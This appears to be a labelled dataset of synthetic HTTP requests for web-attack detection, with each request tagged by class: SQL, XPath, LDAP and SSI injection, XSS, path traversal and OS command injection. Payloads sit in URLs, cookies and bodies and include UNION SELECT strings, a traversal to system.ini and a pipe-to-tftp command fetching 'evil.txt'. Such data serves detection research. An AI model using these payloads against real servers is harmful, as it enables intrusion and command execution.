GET /sw9kgExU.f/aznknaai8lde/eMgXQ.C/2EyLrNTr-2zC_/iBkFhwc/rDRLoHB_zzDNp.jpeg?w0seutl0ew=idd&8Iboq=4Jy&echo_jRZ97q=a&odste=451988313&zehope=66&iaendY9a94oen=hehshp0v&8dxlsfyrgrr=woi%29%28++++%7C%28ihnd%3D*%29&Aniswytt=ta&c4setolonsX=al5+&sstfduiAqea0Hu=23085&Ec=y+sock_streamekisH-hjRrowl&SU6documenti2N=prt%40&nKhheyT=7jaYs%3Aan1&iSitfiSnohhfsO=r9il HTTP/1.0
Host: www.n7e7gjjot.com
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity;q=0.7
Accept-Language: *;q=0.3
Cache-Control: max-stale=1416
Client-ip: 106.160.89.209
Cookie: zh=eSsaqWdr0y3  ;dnrnLwqqglaeet8=f zptaahsecowr;noesuAz=937263;Iebeii=woa;eiOintla4l=ed;atles=Hdnoanie
Cookie2: $Version="69"
Date: Sat, 02 Jun 07 18:28:58 CET
ETag: W/"AMXW7dHrAGf@J@P3v-"
Expect: psersns=esanan
From: nteal@6riIt.fr
If-Modified-Since: Thu, 31 May 07 12:33:49 CET
If-Unmodified-Since: Sun, 21 Dec 08 24:32:52 GMT
If-Match: "xgcwyoh6OBbh5B5D"
If-None-Match: *
If-Range: "_ca5UBQDF7Ac8kaj"
Max-Forwards: 821
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM aXJoenJoN2NpbmdpZnJoY0t0bHNkZW9pc3lkaGI2ZGQ=
Authorization: ndeT l2ftnt=toae
Range: 03-,-49
Referer: /rins/yntydoti/emfEelA/2wtTr1.swf
TE: trailers
Trailer: Pragma
User-Agent: e1mSVua4 http://www.bSphn.it
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: compress
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 82.192.128.217
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37956
Start - Id: 47442
class: XSS
GET /mPatdbIk-qz9Rk/epobgarecTef4ls/aQcUaH.pl?Sfig=9&jmnartehscq1hn6=kRaS3STP&jutvtshoeg=30&5qclgRf4pL=6M0acoxsr&gpac9rslenn=lmuel&PpasswdWFzservicesPgOxt=javascript%3A++alert+%28%22+b.Wy%22%29&to=m%3F&mN=gAb&hcb7tT=rtmeeduTyheHi5ucf&8CrmDexecsystem2h=tigasnaeshpassthru9nlt0ala+ HTTP/1.0
Host: www.lnOn8ii.org
Connection: keep-alive
Accept: text/plain;q=0.4
Accept-Charset: x-mac-chinesetrad, iso-10646-ucs-2, hz-gb-2312;q=0.9, windows-1252, gb2312
Accept-Encoding: 
Accept-Language: adal-uaca1wo;q=0.6, kalo8eni-eoaGE
Cache-Control: only-if-cached
Client-ip: 33.233.160.141
Cookie: iesuil8hr=autoexecnode;owadaiibLmc1xb=rrjIG@;in=ejnwbgtnddsDmtdj;group by7o6hIoGlsX=ga5enetkowe2;negoihfuS=86772
Cookie2: $Version="05"
Date: Fri, 23 Feb 07 17:13:00 GMT
ETag: W/"USbOQLZFotY12CP"
Expect: emr8ts
From: desfe5rt@owenslwi5e.org
If-Modified-Since: Fri, 01 Oct 04 10:54:28 UTC
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "cr9wjUcukfFuJApk9"
If-None-Match: *
If-Range: *
Max-Forwards: 4830
MIME-Version: 2.5
Pragma: rne3eOEB='kasef2'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM SGVlaWl0eXR0aGlhMHBvZTVDYW1vb3VyY2FwNTZ0dE9Jc3ljbHp0cm55aWl5YWVz
Range: 13744-31405
Referer: /ceustwri.asp
TE: chunked;q=0.3,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/6.1 (Windows; U; Windows NT 9.0; xs-bh; rv:5.3.5) Gecko/49205583
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 644x740
Via: 0.1 www.nstlee.shtml
Transfer-Encoding: Dhai; Rdatig5=zmadiaun
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 226091720709125
----: -----------
~~~~~: ~~~~~~~~~~

null

End - Id: 47442
Start - Id: 38045
class: LdapInjection
GET /tLYh/ssgsamwntbarxjtgeoeo/kMBeL2Qf9g_/k945/e0E9u-1e5zCu-/dqguq/dN/YKSEzjiUFM/9dhahGtsaDvatralxdu/btektcni/Uawcpa/k9HtQ6WhKmZautoexecX2a.jpg?ihmesioyt7eA=6281&bee=r2tE&egoit=1228&MKHr=astmxtvojecvmr7in&tlrEia3=e-rp&qn7ar=%3Eok&Gv@Ja4gUNs=%29++++%28++%7C++++%28cn%3D*o%27brien*%29%28mail+++%3D*o++%27brien*+++%29++&sK9@xk=ew%28between&ffLo@UYQ=i2l%7E%3Av0nservicesncna&YSL7etcXai=%3Fn&j9insjrcdneh=44724&Tattuoml=8087634597&3NJOqO3OYF=%40&KxhttpbetweenH5CEwgetH67=sa HTTP/1.1
Host: 184.22.133.127
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, identity;q=0.5, deflate;q=0.0
Accept-Language: *
Cache-Control: min-fresh=6090
Client-ip: 95.187.198.147
Cookie: MMn7d=362;pinisewo=hpJxgiAiF;VuUmRphpjGkunionv=xn+ 
Cookie2: $Version="114"
Date: Mon, 21 Dec 09 16:46:52 GMT
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: oTo0xsi=menaree;nEnewski
From: deigiel@Ostrbaef.it
If-Modified-Since: Tue, 03 Mar 09 05:55:41 CET
If-Unmodified-Since: Sat, 29 Jan 05 06:07:42 GMT
If-Match: "FIyTEpIhW2ABRo5"
If-None-Match: *
If-Range: "QMRAQjv9PG5j7nUDk"
Max-Forwards: 30
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest qop=auth-int
Range: 6583-,350-4,-7502
Referer: /Ahti/szil.jpeg
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: hu7kRK http://www.uhrrre.ch
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 0.2 23.8.130.55:17
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 961 113.136.152.242 "nasatnD5Noznimfy" "Sun, 16 Apr 06 05:05:21 UTC"
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38045
Start - Id: 48493
class: XPathInjection
GET /3KkBY/iiaSoteho/nhnnhsrai/l6h0ems7melantNn/r2JBM/iao33eXu.gif?@xterm4uqnode4Zdh=iZ&2rtetahtsa=887265&eogykCySereshs0=4&mitBii=uM&c2=lst+8p%7Ct&2dyPeaes=3fsb%5Cs&leWQ6WD=n2eM9&3MconnectL=ue+o3%3B&oerhdnim7=usspasswdn5il0l%5Dranis&k9=cSbH-pCm&AUlkDJ=eirhnEuTtt%3A HTTP/1.0
Host: 23.249.241.235:337
Connection: keep-alive
Accept: text/html;q=0.6, text/xml;q=0.7
Accept-Charset: euc-tw;q=0.6, x-mac-chinesetrad, windows-1251;q=0.4, x-mac-chinesesimp;q=0.1, iso-8859-1
Accept-Encoding: 
Accept-Language: snycri4-epsshtt, irewv-vS;q=0.5, oxue9-ielteh;q=0.0, dve-soop8o, rrae-hurEA;q=0.2
Client-ip: 203.11.208.172
Cookie: k3rafaerdu0l=avarhii%u;rre1=dtxlo'     or   1<    0dor/htcE/cuhlyw/child::text()[position()=8]     or   'omnte'   =  '
Cookie2: $Version="3"
Date: Wed, 04 Mar 09 14:41:03 GMT
If-Unmodified-Since: Mon, 01 Aug 05 13:45:25 CET
Authorization: Basic Zm9EZWQ6Y21pdGRlZg==
Referer: http://www.Ela8n.org/tore/oetk/irstpe/uesrewEe/seob0ee4.js
User-Agent: nlcroreuDt (a69hZlG; iLfnHYOD; h.9QY6b4nw; o39IPt; ox7XxyAV@)
~~~~~: ~~~~~~~~~~~

null

End - Id: 48493
Start - Id: 39490
class: SSI
POST /a_.lvn@KM4.html? HTTP/1.0
Content-Length: 59
Content-Language: hor6a,asvc,1i
Content-Encoding: deflate
Content-Location: /Ctaiea/X0ce2/7rnirtio/9eruLp.jpeg
Content-MD5: ZW5mYW53aHJsb2VocnJrZg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Jan 09 19:11:48 GMT
Host: www.mibr.de
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, compress, identity;q=0.9, identity;q=0.9
Accept-Language: *
Cache-Control: only-if-cached
Cookie: lyhNoshjw3wnhc=o9rchza;z-d@7=<!--#email fromhost="www.gteaddb.com" tohost="mailbox.pteyv.com" message="tlaA eGnf1s 3Begres9 n63t" fromaddress="trrni.com" toaddress="reOn.pfo.com" subject="s" sender="i5e.com" replyto="nOsean.com" cc="3h" inreplyto="huOh eja oy1Gd3" id="ihgmail" -->;fmXsHNL=access_logq+ietscript;7lu9=a%;Jw9CPhJ.uOL=6836445
Cookie2: $Version="60"
Date: Sat, 07 Apr 07 24:48:14 GMT
ETag: W/"5.XvBUTVvPCjRElg8J"
If-Match: ".HJddHGMw07PF09"
If-None-Match: "j_zcxY5NF.6GS6Vjb"
If-Range: Thu, 20 Oct 05 09:33:01 GMT
Max-Forwards: 7
Pragma: no-cache
Referer: http://nsd1sew.st/efdrhy/vaeuzs6/ai3uta/o2ra.avi
TE: gzip,trailers,gzip
Trailer: Upgrade
User-Agent: neaiAbna2ienaz7g8
UA-Pixels: 9181x194
Via: 3.5 123.10.99.36, HTTP/5.0 www.nyglav.shtml
Transfer-Encoding: compress
Warning: 942 6.71.33.5 "mnrm" 
X-Forwarded-For: 0.217.134.106
~~~~~: ~~~~~~~~~~~~~~~~

0hqireugXsr=loN7&anph-MezL=5XILCKw_N4bL&8omTrm6zgIfilpE=027

End - Id: 39490
Start - Id: 35184
class: SqlInjection
GET /oaka/tYTenodap2neiriait/9C/sqw.mciXjAqUSmDYY/x20oHEsPpgTV8RR0/ooDtiehi/pm@-.jpeg?310ys=%27+++OR+%27pqiede%27+++++%3D++++N%27++++&kQpCNdj=irpvqwheree%2Bne&24ytAeog9Lm=rtz HTTP/1.0
Host: www.iwe0ed022t.st
Connection: esljaaa
Accept: */*
Accept-Charset: iso-8859-15
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: eea=e8mkAx1f
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Sat, 13 Jan 07 06:18:34 GMT
ETag: W/"MmDAZwouxSzTM9a"
Expect: twhn
From: as5oeh@nl7ehee.ch
If-Modified-Since: Tue, 23 May 06 16:55:25 CET
If-Unmodified-Since: Fri, 21 May 04 18:51:43 GMT
If-Match: *
If-None-Match: "UkwHvXsSWbTZVHc834"
If-Range: *
Max-Forwards: 052
MIME-Version: 2.3
Pragma: AdmndsSs='5oUov'
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: ea2oq rvfukh0=4ucd
Range: -76801,392-,94069-
Referer: http://www.nea3c.de/9oadhi/4mtasp/oquyeerw.png
TE: trailers
Trailer: Referer
User-Agent: Mozilla/0.9 (Windows; U; Windows NT 2.1; de-a7; rv:5.0.1) Gecko/71788659
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
Via: FTP/3.0 www.idnZ5dhb.shtml:8947, 0.8 www.eosg.tiff, 8.2 226.51.246.82
Transfer-Encoding: gzip
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35184
Start - Id: 41311
class: SqlInjection
GET /n.VZobS1Fx31@/nIV5xmlautoexec/frTthjo/nodeVwindow.openfromoySi8T/eKG5iyHEDkNm0/j2yihnYmeonT8i6n9fs6/Q9_Osock_streamN0wh3/BJBGUJKFob/irqtO.png? HTTP/1.1
Host: www.iepatsas.net
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: *
Accept-Encoding: 
Accept-Language: ae-qMSmJ;q=0.3
Cache-Control: only-if-cached
Client-ip: 70.57.112.146
Cookie: HA7Ubzl71=uaqFIOo9B;olqnkeldclui4y=g+o[tee@tu/xylltmp;oexfwtrbnf=3;itt7hee=;ide+Us~0ikU;tq;tn55imEe6ib=;   EXEC(  'INS'+'ERT  INTO  users     values(28180,'5nnnmg','oeheo'))
Cookie2: $Version="830"
Date: Sun, 25 Sep 05 23:35:44 CET
ETag: W/"Hy_VR_-dEu60ceNO"
Expect: 100-continue
From: ueaeFah@isedattkdk.be
If-Modified-Since: Thu, 02 Mar 06 17:39:44 CET
If-Unmodified-Since: Mon, 03 Jul 06 02:15:39 CET
If-Match: "phNdOK6XvC.xxXVAXY"
If-None-Match: "JL3AbqFeCvdXD4_V-5"
If-Range: Fri, 11 Dec 09 13:02:14 GMT
Max-Forwards: 1
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest response="6194CAa6Ca7a4F3B82eAe24071229C1F"
Authorization: Basic aWVvaWM6dWV0eFU=
Range: 3-1402,-33161,6-385
Referer: http://utallsd.de/3kes4th/soece/oe8d/tLtr.tar.gz
TE: trailers,deflate,gzip;q=0.0
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 6.8; ft-tm; rv:0.0.2) Gecko/37147599
UA-Disp: 925,428,8
UA-Color: color16
UA-Pixels: 187x5335
Via: HTTP/0.0 88.73.39.221
Transfer-Encoding: gzip
Upgrade: nnsM/5.9, mwhnm/2.8, c99rl/3.1, eihsFs/6.2
Warning: 506 www.ahaarsa.jpg "smnu" 
X-Forwarded-For: 139.28.183.159
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41311
Start - Id: 49235
class: XPathInjection
GET /iarhezuEuinnhsattl/pw/tsalcAzfri/RperlIKGDQqjQOhavingD/uxred3e/lfnE.jpeg?eesW7m=nme&ioots9=nTtaed%2Fseite%2Feeqc9o%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D574%5D+++++or+++++%27es5%27%3D+++%27&Ht00ps0=olEte3eoarxionter&lr6ini8an=h%28L&s672qosikoss=t48&rgs5iEgeigi6H=532409&desaes=ormdc%3Fw%3Das&tsa8Wawhrn=o52nie64ee HTTP/1.1
Host: 253.23.72.251:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-cyrillic, iso-8859-1;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: only-if-cached
Client-ip: 97.195.21.197
Cookie: oonEjnU=hhtpasseoeezwre;jNdexdotUzr=267656461
Cookie2: $Version="911"
Date: Fri, 09 Apr 10 14:47:01 UTC
ETag: W/"@I55TFnnWMOE6wgh"
Expect: 100-continue
From: ebT3@niat.fr
If-Modified-Since: Mon, 29 Dec 08 04:50:04 UTC
If-Unmodified-Since: Wed, 23 Jan 08 11:47:52 UTC
If-Match: "B3dIScTW0-631oqrVre"
If-None-Match: "EdGH8tIYRZaWjxH"
If-Range: "D@9Plj7rNhFwXCgE.a"
Max-Forwards: 157
MIME-Version: 5.2
Pragma: johtk='ttQ'
Proxy-Authorization: NTLM d2NybGtuaXlhYXRpWWU4cmVIZDhkZWppaHVhdzFEY2RzYWVud3Rucm1kb2xmUkxk
Authorization: lrtk2e iuti=tps7h
Range: -364650
Referer: /nztgyYn/f3bl90/etiii.php4
TE: gzip;q=0.7,chunked;q=0.2
Trailer: Date
User-Agent: Mozilla/8.3 (X11; U; Linux i586 6.0; mx-rr; rv:6.4.0) Gecko/79671326
UA-CPU: Sparc
UA-Disp: 2447,4165,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 353x220
Via: 1.3 194.30.11.242, 6.1 www.eoxiEct0.css, Isbr6n/5.0 234.74.124.76
Transfer-Encoding: identity
Upgrade: 8rpe5E/5.6, tre/6.8, 6Gt/7.8, xleel/2.7
Warning: 218 61.225.42.189 "r5Iaw8enn" "Mon, 02 Feb 09 06:59:22 GMT"
X-Forwarded-For: 159.181.91.193
X-Serial-Number: 15070707581939695
----: ----------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 49235
Start - Id: 40392
class: SSI
GET /J1yo2dWzDY2c2includev/9G@JechoTa-Po5linkYj/2ts9reaypfa0/8.7u.cgi?mvh=%28htode%7Efun&ete0iekoa=agXo HTTP/1.0
Host: 117.67.242.237
Connection: rbr1
Accept: video/quicktime;q=0.3, image/*;q=0.2, application/x-tar
Accept-Charset: utf-7;q=0.0
Accept-Encoding: gzip, identity, gzip;q=0.3
Accept-Language: Deeeqhiz-e, msmariuE-lehsis, saenrea9-seoGssu, mcEe9-mSd8unpl, pk-sjxtnyaL
Cache-Control: max-stale=10854
Cookie: AaJ9nehmv7i=<!--   #include virtual="d:\windows\autoexec.bat"   -->;xtetf1sbre0=dss8adne;tJYNu6DftpcgRO=0djrrcc uges nhxdropmE
Cookie2: $Version="9"
Date: Mon, 05 Sep 05 19:55:11 GMT
Expect: 100-continue
From: 8ah6@byoebtege.fr
If-Modified-Since: Fri, 20 Mar 09 12:34:17 CET
If-Match: *
If-None-Match: "M2PZ5RhRCVN.xolmB@5a"
If-Range: "IO9d_eoOSzMovBn"
Pragma: z=s
Referer: /rpalm/uIrrhfoe/0eaIia/neezbleo.png
TE: deflate
User-Agent: rJjOJ1 http://www.ndie.biz
UA-CPU: 68000
UA-Pixels: 3493x217
Via: prha/6.0 www.tl3se.html, aeo/2.8 www.tnE8Rr3.jpg
Transfer-Encoding: l6iY; hdnptlh=nqftnRRp
----: ----------------------------------

null

End - Id: 40392
Start - Id: 38138
class: LdapInjection
GET /u8Z4sock_streamformG/AXoS-G/Zw1mIBsscripth-cQfv/argvoniEatu/1sggh1atepoyunhttatl/ijsmzDalsreob/hf/4h_bgrrS3eSnXn/hDeSmsTCL5/gnw-1TIwK-CzEY.html?nroArerchheoty=%29++%28%7C%28displayName%3Dhad*%29+%28name++++%3D++++had*++%29%28+mail%3Dhad*+%29 HTTP/1.0
Host: www.tsoap7kpe.cz:2123
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 255.68.111.185
Cookie: iabaaag=aaew;2le=9500322088;.b90z1jA=6l7passwdeb;5ttanfeEhtaet87=66440;Goza=2
Cookie2: $Version="23"
Date: Mon, 28 May 07 02:02:29 CET
ETag: W/"D3jh1zv2QW47wqbRfV"
Expect: 100-continue
From: yoralt7@issci.gov
If-Modified-Since: Mon, 03 May 10 15:11:59 UTC
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "qF71BkNVQyI.4Ygg"
If-None-Match: *
If-Range: Mon, 25 May 09 17:15:25 UTC
Max-Forwards: 927
MIME-Version: 1.0
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: NTLM aE83aW9tbnowaWhpN2VFc291ZWt5d0FnT29zbGloc2k0WmVx
Range: -49,90-,6-
Referer: http://www.rtt93.uk/uerpNrn/tuofrgcg/oiosb/tdat/6lp6ab.tiff
TE: chunked,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 2.8; dI-9o; rv:0.4.2) Gecko/99081574
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2471x139
Via: 1.0 www.atrTnaei.jpeg, 0.6 170.98.221.232, 4.7 62.173.119.58
Transfer-Encoding: deflate
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38138
Start - Id: 45369
class: PathTransversal
PUT /uDuCVadMgJPwri.php4? HTTP/1.0
Content-Length: 95
Content-Language: aotcur
Content-Encoding: identity
Content-Location: http://Yebt.be/ard3/u3arU6t/mnss/easae4jq/usfyrueh.php3
Content-MD5: dG1pdGlpZGlTaWhqaWV0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 28 Feb 10 01:38:33 GMT
Last-Modified: Sun, 13 Jan 08 08:57:49 UTC
Host: 156.206.41.130
Connection: close
Accept: image/jpeg;q=0.8, video/*, image/*
Accept-Charset: utf-8;q=0.1, macintosh;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-stale=5
Client-ip: 45.42.189.117
Cookie: seNgsuctstazet= 2 ;e9z=scriptsyav znf;cois=62593119;replaceccJlikeY=2107424111;lt=cQNElKBKr;ZyY8ya8GzRi=9
Cookie2: $Version="0"
Date: Wed, 04 Aug 04 17:06:51 UTC
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
From: meaol@shaU.gov
If-Modified-Since: Sat, 20 Mar 10 11:23:22 UTC
If-Unmodified-Since: Mon, 05 Sep 05 01:51:12 CET
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: *
If-Range: Wed, 15 Feb 06 13:51:42 UTC
Max-Forwards: 4
MIME-Version: 4.4
Pragma: eel='sy'
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: Digest uri=http://www.o79mnh.org/gTci/rd7hnnis.tar
Range: 74377-10,-135
Referer: /iisofo.msf
TE: trailers,gzip;q=0.4
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.7 (compatible; MSIE 4.3; Unix; 2e2ynszi; tduds; ihoaetCt8e)
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: HTTP/8.7 182.24.46.159, enei/5.9 www.ctynna74.gif
Transfer-Encoding: compress
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ta=..\..\..\..\..\..\..\..\..\WINDOWS\system.ini&stcrde2zdnengti= Hpechotmp

End - Id: 45369
Start - Id: 49683
class: XPathInjection
GET /f-FAsjv7/hmfjuFyFGy/me.cgi?a5taau=5403+++or+++++tr%2FEtr%2Fndyans%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D56%5D+++or+6633%3D&nhure=ids&ZiAFKUkE=aoctchesnt5nhrg&bargyR2stip4lTi=35&M@._57MGvbscriptC=%40&http.TGOZCJpyJ=44218&tl2eOjcama9bEd=eoUie&oe5mtweobdh9n=aEARUcXzAa&coah2iicbx=hAy&noTfia=%3Cbnsslpninsertd HTTP/1.0
Host: www.d5fg.net:80
Connection: keep-alive
Accept: video/quicktime;q=0.5, audio/*, audio/basic;q=0.5
Accept-Charset: x-mac-ce;q=0.9, iso-8859-2;q=0.3, windows-874, iso-8859-2;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.28.43.223
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="176"
Date: Fri, 16 Apr 10 17:58:14 UTC
ETag: "kEZV4g66j0qldaMaD"
Expect: 100-continue
From: ohsiewp@laEeuatptq.st
If-Modified-Since: Mon, 20 Oct 08 16:16:27 CET
If-Unmodified-Since: Fri, 18 Jul 08 02:13:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 500
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: http://www.tafaohc9.biz/anrn/e2nea7r.css
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: nagiqrt6 (n06tAI)
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: 8.3 134.199.183.150:152
Transfer-Encoding: deflate
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49683
Start - Id: 44590
class: OsCommanding
GET /dg2xg_Z/oa/oeowD/xstdindocumentFU6vMj/ecfy-dD@/xE5s03jG.K4hMy_O/evtzlA8X_2hPUcPcX6/hszSWRfb6jCXTs_P/DVZKvD3lKhttpN.htm?aWp0Oc=247.64.40.249%7C+++tftp+192.168.10.33+evil.txt&cesnenrhshuteo=%3C%3CipC&x8pNtr=atbatteiedMr7u&tpu=9069576&umgrn=h9F0FIrgNBd0&wer1zaIHn=%3E9&nn=egSW2jPYZYSb&Hy=o_v&tekYu7Ym7es80=26976 HTTP/1.1
Host: 251.115.167.205
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: compress;q=0.3
Accept-Language: saoTose-ulpiy;q=0.8, ht3-moyrwh, edfy6hr-rifnn, za-d;q=0.4
Cache-Control: EoNrS=6eroon
Client-ip: 61.207.233.103
Cookie: hmv3sgeceThac=46;ao=dyopt&otkr-on
Cookie2: $Version="6"
Date: Mon, 13 Feb 06 02:06:33 UTC
ETag: "w78aexpupN8g9SbMEjW"
Expect: 100-continue
From: fn96a@esnteln.biz
If-Modified-Since: Fri, 20 Aug 04 03:37:18 GMT
If-Unmodified-Since: Thu, 09 Jun 05 05:10:08 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 16 Feb 06 06:50:00 UTC
Max-Forwards: 6
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM NnN3c3JsZWkxb2VpZ2NheDhydHRsZXRpaWwxbG9vY3pGZWlk
Authorization: Basic bmNvaWxvY3k6b2xzZnJiaHU=
Range: -2578
Referer: http://owye.fr/g6e00/mq2tsncz.css
TE: chunked,trailers
Trailer: Accept
User-Agent: nSeuoaoue (dK5-cFVWwM)
UA-Color: color8
Via: 7.9 www.iakk.gif, FTP/8.9 27.142.127.246
Transfer-Encoding: snj8; nicerN=hnu2rds
Upgrade: stnat6/0.0
Warning: 383 www.Mece.jpeg:13 "gitirtep1tr" "Mon, 15 Feb 10 03:00:27 CET"
X-Forwarded-For: 84.212.52.145
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 44590
Start - Id: 42377
class: SqlInjection
GET /5uQ6divKPX-voBLut/hg2atseisBerldmmlei5/1IcopyUqtdtmp/Y.processing-instructionMLL1IvBAX/yesuUelpntxtnr/K7/oranbstfIoena.msf?T7lalcheEsodln=skonaaoiEgeeUsl6&irnmnyEagoESje=66166380&rs=%27++%29+UNION+++ALL++++SELECT+lsotejj+++%2C+++++n7Talte++++%2C+++neTl+++++FROM+++aasdhOm++WHERE++caNC7bm+++NOT+++++IN+%28+%27otn46oq%27+%29+AND+tdNoiiteod+++++NOT+++++IN+%28%27efH5smdhR%27++%29+++AND+++%27%27%3D++%27&rTdaq3ee3e=selectfntSxos&94urmwo=eeeeravbd&osahm=0450816&orrBsasreeo5I9=eHdui&egz9wu=3 HTTP/1.1
Host: 64.84.183.167:80
Connection: close
Accept: */*
Accept-Charset: cp-936;q=0.8, utf-7;q=0.2, iso-8859-5;q=0.4, cp-950;q=0.7, iso-8859-5
Accept-Encoding: compress, identity;q=0.9, compress, compress;q=0.9, deflate
Accept-Language: Tl8-at3;q=0.4, imWat-9aot, lh2-Use;q=0.3, hSWhd-sh
Cache-Control: heux='eniunse'
Client-ip: 237.97.207.139
Cookie: xOhttpsOi=7379
Cookie2: $Version="380"
Date: Tue, 23 Feb 10 20:48:49 GMT
ETag: "tN-IZ4t1Xvz3PGGu4c"
Expect: Ee02n=ittst6sO;hlInLqdo=cld7
If-Modified-Since: Tue, 27 Dec 05 21:25:59 UTC
If-Unmodified-Since: Wed, 26 Nov 08 20:53:32 CET
If-None-Match: *
Max-Forwards: 916
Authorization: Digest cnonce="eiJd"
Referer: http://mrou.uk/ot4tb79w/i3itWrZ/ehOtshce.tar
Trailer: Cache-Control
User-Agent: Mozilla/4.4 (Windows; U; WinNT 0.4; ne-EO; rv:8.8.7) Gecko/85118129
UA-Pixels: 3589x325
Warning: 305 107.162.173.32 "qpsdina83o" "Fri, 17 Nov 06 24:21:49 CET"

null

End - Id: 42377
Start - Id: 45880
class: PathTransversal
